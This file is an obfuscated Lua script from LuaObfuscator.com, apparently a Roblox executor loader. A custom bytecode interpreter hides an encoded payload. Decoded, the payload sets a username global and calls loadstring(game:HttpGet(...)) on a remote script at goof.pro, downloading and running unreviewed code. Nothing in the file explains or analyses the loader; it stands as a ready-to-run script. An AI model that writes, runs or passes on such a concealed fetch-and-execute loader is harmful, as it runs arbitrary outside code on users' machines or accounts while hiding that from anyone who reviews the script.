--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==0) then v101=v5(v84,v19);v19=nil;v100=1;end if (v100==1) then return v101;end end else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -(117 -(32 + 85)) ;local v86;while true do if (v85==(0 -(0 + 0))) then v86=(v31/(2^(v32-(1 -(0 + 0)))))%((4 -(959 -(892 + 65)))^(((v33-(620 -(555 + 64))) -(v32-(932 -((2043 -1186) + 74)))) + (569 -(367 + 201)))) ;return v86-(v86%1) ;end end else local v87=2^(v32-(1271 -(226 + 1044))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 -0) ;end end local function v21()local v34=350 -(87 + 263) ;local v35;while true do if (v34==(181 -(67 + 113))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (6 -2) ;return (v41 * (16778168 -(802 + 150))) + (v40 * (185570 -120034)) + (v39 * (1253 -(915 + 82))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1 -0 ,20) * (2^32)) + v42 ;local v46=v20(v43,1208 -(1069 + 118) ,31);local v47=((v20(v43,72 -40 )==(1 -(0 + 0))) and  -(1 + 0 + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(791 -(368 + (1195 -(201 + 571))))) then return v47 * (1138 -(116 + 1022)) ;else local v91=0;while true do if (v91==(0 -0)) then v46=19 -(10 + 8) ;v44=0 -0 ;break;end end end elseif (v46==((10362 -7873) -(416 + 26))) then return ((v45==((0 + 0) -(0 -0))) and (v47 * ((1 + 0)/((0 -0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1461 -(145 + 293)) ) * (v44 + (v45/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==((2910 -2051) -(814 + 45))) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=2 -(4 -3) ;end if (v49==(1 + 1)) then v51={};for v92=1, #v50 do v51[v92]=v2(v1(v3(v50,v92,v92)));end v49=2 + 1 ;end if (v49==(886 -(261 + 624))) then v50=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;v49=1082 -(1020 + 60) ;end if (v49==((562 + 864) -(630 + 793))) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1690 -(209 + 1481) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==0) then v53=0 -0 ;v54=nil;v52=1;end if (v52==(1639 -(1373 + 263))) then v59=nil;v60=nil;v52=4;end if (v52~=(1001 -(451 + 549))) then else v55=nil;v56=nil;v52=1 + 1 ;end if (v52~=(2 -0)) then else v57=nil;v58=nil;v52=3;end if (v52==4) then v61=nil;while true do if (v53~=(6 -2)) then else while true do if (1==v54) then local v102=0;local v103;while true do if (v102==(1384 -(746 + 638))) then v103=0 + 0 ;while true do if (v103==0) then local v153=0 -0 ;while true do if (v153~=(342 -(218 + 123))) then else v103=1;break;end if (v153~=0) then else v57=nil;v58=nil;v153=1582 -(1535 + 46) ;end end end if (1==v103) then v54=2;break;end end break;end end end if (v54~=2) then else v59=nil;v60=nil;v54=3 + 0 ;end if (v54==0) then local v104=0 + 0 ;while true do if (v104==(560 -(306 + 254))) then v55=0 + 0 ;v56=nil;v104=1 -0 ;end if (v104==1) then v54=1;break;end end end if (v54~=(1470 -(899 + 568))) then else v61=nil;while true do local v105=0 + 0 ;local v106;while true do if ((0 -0)==v105) then v106=603 -(268 + 335) ;while true do if (v106==1) then if (v55==0) then local v170=0;local v171;while true do if (v170~=0) then else v171=290 -(60 + 230) ;while true do if (v171==(572 -(426 + 146))) then local v178=0;while true do if (v178~=(1 + 0)) then else v171=1457 -(282 + 1174) ;break;end if (v178==(811 -(569 + 242))) then v56={};v57={};v178=1;end end end if (1==v171) then v58={};v59={v56,v57,nil,v58};v171=2;end if (v171==(1026 -(706 + 318))) then v55=1;break;end end break;end end end break;end if (v106==(1251 -(721 + 530))) then if (v55~=1) then else local v172=0;local v173;while true do if (v172==(1271 -(945 + 326))) then v173=0 -0 ;while true do if (v173~=(2 + 0)) then else v55=2;break;end if (v173~=(701 -(271 + 429))) then else local v179=0;while true do if ((0 + 0)==v179) then for v182=1501 -(1408 + 92) ,v60 do local v183=0;local v184;local v185;local v186;while true do if (1==v183) then v186=nil;while true do if (v184~=1) then else if (v185==1) then v186=v21()~=(1086 -(461 + 625)) ;elseif (v185==(1290 -(993 + 295))) then v186=v24();elseif (v185==3) then v186=v25();end v61[v182]=v186;break;end if (0~=v184) then else local v194=0;local v195;while true do if (v194~=0) then else v195=0;while true do if (v195~=(1 + 0)) then else v184=1;break;end if (v195~=(1171 -(418 + 753))) then else v185=v21();v186=nil;v195=1 + 0 ;end end break;end end end end break;end if (v183==(0 + 0)) then v184=0 + 0 ;v185=nil;v183=1 + 0 ;end end end v59[3]=v21();v179=530 -(406 + 123) ;end if (v179==(1770 -(1749 + 20))) then v173=2;break;end end end if (v173~=0) then else v60=v23();v61={};v173=1 + 0 ;end end break;end end end if (2==v55) then local v174=0;while true do local v175=1322 -(1249 + 73) ;while true do if (v175==(0 + 0)) then if (v174==1) then return v59;end if (v174~=0) then else local v180=1145 -(466 + 679) ;while true do if (v180==(0 -0)) then for v187=2 -1 ,v23() do local v188=0;local v189;local v190;while true do if (v188==(1900 -(106 + 1794))) then v189=0 + 0 ;v190=nil;v188=1;end if (v188~=(1 + 0)) then else while true do if ((0 -0)==v189) then v190=v21();if (v20(v190,2 -1 ,1)==(114 -(4 + 110))) then local v196=584 -(57 + 527) ;local v197;local v198;local v199;local v200;while true do if (v196==(1427 -(41 + 1386))) then v197=0;v198=nil;v196=1;end if ((104 -(17 + 86))~=v196) then else v199=nil;v200=nil;v196=2;end if (v196==(2 + 0)) then while true do if (v197~=(0 -0)) then else local v201=0 -0 ;local v202;while true do if (v201==(166 -(122 + 44))) then v202=0 -0 ;while true do if (v202==1) then v197=1;break;end if (v202==(0 -0)) then local v214=0;while true do if (v214~=(1 + 0)) then else v202=1 + 0 ;break;end if (v214~=(0 -0)) then else v198=v20(v190,2,68 -(30 + 35) );v199=v20(v190,3 + 1 ,1263 -(1043 + 214) );v214=1;end end end end break;end end end if (v197==(7 -5)) then if (v20(v199,1213 -(323 + 889) ,1)==1) then v200[2]=v61[v200[5 -3 ]];end if (v20(v199,582 -(361 + 219) ,322 -(53 + 267) )==(1 + 0)) then v200[416 -(15 + 398) ]=v61[v200[985 -(18 + 964) ]];end v197=11 -8 ;end if (v197==(1 + 0)) then local v203=0;while true do if ((1 + 0)~=v203) then else v197=2;break;end if (v203~=0) then else v200={v22(),v22(),nil,nil};if (v198==(738 -(542 + 196))) then local v211=0 -0 ;local v212;local v213;while true do if ((0 + 0)==v211) then v212=0 + 0 ;v213=nil;v211=1;end if (v211==(1 + 0)) then while true do if (0==v212) then v213=0;while true do if ((0 -0)~=v213) then else v200[3]=v22();v200[4]=v22();break;end end break;end end break;end end elseif (v198==1) then v200[3]=v23();elseif (v198==2) then v200[3]=v23() -((4 -2)^(1567 -(1126 + 425))) ;elseif (v198==(408 -(118 + 287))) then local v217=0;while true do if (v217==(0 -0)) then v200[3]=v23() -((1123 -(118 + 1003))^(46 -30)) ;v200[4]=v22();break;end end end v203=378 -(142 + 235) ;end end end if ((13 -10)~=v197) then else if (v20(v199,1 + 2 ,3)==(978 -(553 + 424))) then v200[4]=v61[v200[4]];end v56[v187]=v200;break;end end break;end end end break;end end break;end end end for v191=1,v23() do v57[v191-1 ]=v28();end v180=1;end if (v180==(1 -0)) then v174=1 + 0 ;break;end end end break;end end end end v106=1 + 0 ;end end break;end end end break;end end break;end if (v53==(1 + 0)) then local v98=0;while true do if (v98~=(1 + 0)) then else v53=2;break;end if (v98==(0 + 0)) then v56=nil;v57=nil;v98=1;end end end if (v53==(4 -2)) then v58=nil;v59=nil;v53=3;end if (v53==3) then v60=nil;v61=nil;v53=11 -7 ;end if (v53==0) then local v99=0;while true do if (v99==(2 -1)) then v53=1 + 0 ;break;end if (v99~=(0 -0)) then else v54=0;v55=nil;v99=1;end end end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=11) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]();elseif (v81==1) then v72=v80[3];else local v119=0;local v120;local v121;while true do if (v119==0) then v120=v80[2];v121=v78[v80[3]];v119=1;end if (v119==1) then v78[v120 + 1 ]=v121;v78[v120]=v121[v80[4]];break;end end end elseif (v81<=3) then local v107=v80[2];local v108=v78[v80[3]];v78[v107 + 1 ]=v108;v78[v107]=v108[v80[4]];elseif (v81>4) then for v143=v80[2],v80[3] do v78[v143]=nil;end else local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==1) then v73=(v125 + v123) -1 ;v126=0;v122=2;end if (0==v122) then v123=v80[2];v124,v125=v71(v78[v123](v13(v78,v123 + 1 ,v80[3])));v122=1;end if (v122==2) then for v165=v123,v73 do local v166=0;while true do if (v166==0) then v126=v126 + 1 ;v78[v165]=v124[v126];break;end end end break;end end end elseif (v81<=8) then if (v81<=6) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>7) then v78[v80[2]]=v80[3];else do return;end end elseif (v81<=9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>10) then v64[v80[3]]=v78[v80[2]];elseif (v80[3]=="_ENV") then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=17) then if (v81<=14) then if (v81<=12) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==13) then local v133=0;local v134;while true do if (v133==0) then v134=v80[2];v78[v134]=v78[v134](v13(v78,v134 + 1 ,v73));break;end end else for v145=v80[2],v80[3] do v78[v145]=nil;end end elseif (v81<=15) then v78[v80[2]]=v80[3];elseif (v81==16) then local v135=0;local v136;while true do if (v135==0) then v136=v80[2];v78[v136]=v78[v136](v13(v78,v136 + 1 ,v73));break;end end else do return;end end elseif (v81<=20) then if (v81<=18) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==19) then v78[v80[2]]();else local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==1) then v73=(v140 + v138) -1 ;v141=0;v137=2;end if (2==v137) then for v167=v138,v73 do v141=v141 + 1 ;v78[v167]=v139[v141];end break;end if (v137==0) then v138=v80[2];v139,v140=v71(v78[v138](v13(v78,v138 + 1 ,v80[3])));v137=1;end end end elseif (v81<=21) then v64[v80[3]]=v78[v80[2]];elseif (v81==22) then v72=v80[3];elseif (v80[3]=="_ENV") then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D65030C3O0053746F6E65476E61742O3037030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F672O6F662E70726F2F732F62616E6B2E6C756100163O0012083O00014O000E000100013O0026063O0002000100010004013O00020001001208000100013O00260600010005000100010004013O0005000100120A000200033O00120B000200023O00120A000200043O00120A000300053O002002000300030006001208000500074O000C000600014O0004000300064O001000023O00024O0002000100010004013O001500010004013O000500010004013O001500010004013O000200012O00113O00017O00",v9(),...);
